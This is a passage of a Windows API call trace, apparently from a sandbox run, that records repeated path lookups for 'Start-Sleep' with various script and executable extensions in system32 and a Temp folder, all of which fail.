lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x23 [0176.361] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0176.361] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.361] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.363] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.363] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x23 [0176.364] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0176.364] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.364] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.365] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x23 [0176.366] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0176.366] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.366] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.367] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x23 [0176.367] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0176.368] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.368] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.369] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x23 [0176.369] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0176.369] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.370] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.371] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.371] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JS", lpFilePart=0x0) returned 0x22 [0176.371] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0176.371] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.372] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.372] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x23 [0176.373] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0176.373] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.373] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.JSE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.375] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x23 [0176.375] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0176.375] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.376] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSF", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x23 [0176.377] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0176.377] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.378] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.WSH", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.379] SetThreadErrorMode 